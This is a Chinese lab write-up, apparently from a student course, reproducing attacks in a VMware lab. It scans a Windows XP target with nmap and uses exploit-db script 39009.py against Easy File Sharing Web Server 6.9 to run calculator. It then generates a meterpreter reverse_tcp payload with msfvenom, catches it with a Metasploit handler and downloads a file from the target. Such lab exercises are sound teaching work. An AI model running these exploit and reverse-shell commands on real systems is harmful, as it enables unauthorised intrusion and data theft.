复现任务A

  • 漏洞渗透测试 
    1. 靶机(Windows)安装 easy file sharing server(efssetup_2018.zip), 
    该服务存在漏洞。 
    2. 利用 Nmap 扫描发现靶机(Windows)运行了该服务。P99-100 
    3. 利用该漏洞,使得靶机运行计算器。P116-119 
    复现过程: 
    环境 
    靶机:WindowsXP(IP:192.168.19.130) 
    攻击机:KALI(IP:192.168.19.128)
    平台:VMware 16.2.4 
    靶机配置 
    在靶机上安装并启动 Easy File Sharing Web Server 2018 程序。

信息收集 
查询靶机ip地址

发现靶机 IP:192.168.19.130 
使用 nmap 进行扫描主机:nmap -sV 192.168.19.130

发现目标靶机 80 端口的 http 服务版本是 Easy File Sharing Web Server httpd 6.9 ,这个版本存在缓冲区溢出漏洞。缓冲区溢出是指程序试图向缓冲区写入超出预分配固定长度数据的情况。这一漏洞可以被恶意用户利用来改变程序的流控制,甚至执行代码的任意片段。

渗透过程  
我们在 kali 自带的漏洞利用脚本库中寻找 easy file sharing 的漏洞利用脚本:searchsploit easy file sharing

我们在这里使用的脚本可以让服务器开启计算器并使服务崩溃: 
Python2 /usr/exploitdb/exploits/windows/remote/39009.py 
192.168.19.130 80

执行成功后,查看目标靶机,已经弹出计算器。

二.Metasploit 应用 
1. 生成主控端、被控端。 
2. 获得靶机(Windows)控制权。 
3. 下载靶机上任意一个文件。 
P121-123;140-145 

复现过程: 
环境 
靶机:WindowsXP(IP:192.168.19.130) 
攻击机:KALI(IP:192.168.19.128) 
平台:VMware 16.2.4 

渗透过程 
1. 生成被控端 
在 kali 终端执行命令: 
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.19.128 lport=5000 -f exe -o /root/payload.exe 
该命令是用 msfvenom 来生成一个被控端程序,如果我们让这个文件在靶机上执行的话,那么这台计算机就会立刻回连到 192.168.19.128上。

2. 生成主控端 
在 kali 终端执行命令启动 Metasploit: 
msfconsole 


依次执行以下命令: 
use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp 
set lhost 192.168.19.128 
set lport 5000 
exploit

此时,我们将生成的exe程序复制到靶机上运行:

成功获取权限,现在可以对靶机进行控制了。执行ls查看当前目录文件。输入download 吾爱破解工具.lnk下载吾爱破解工具.lnk软件。

成功下载靶机上的文件。 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值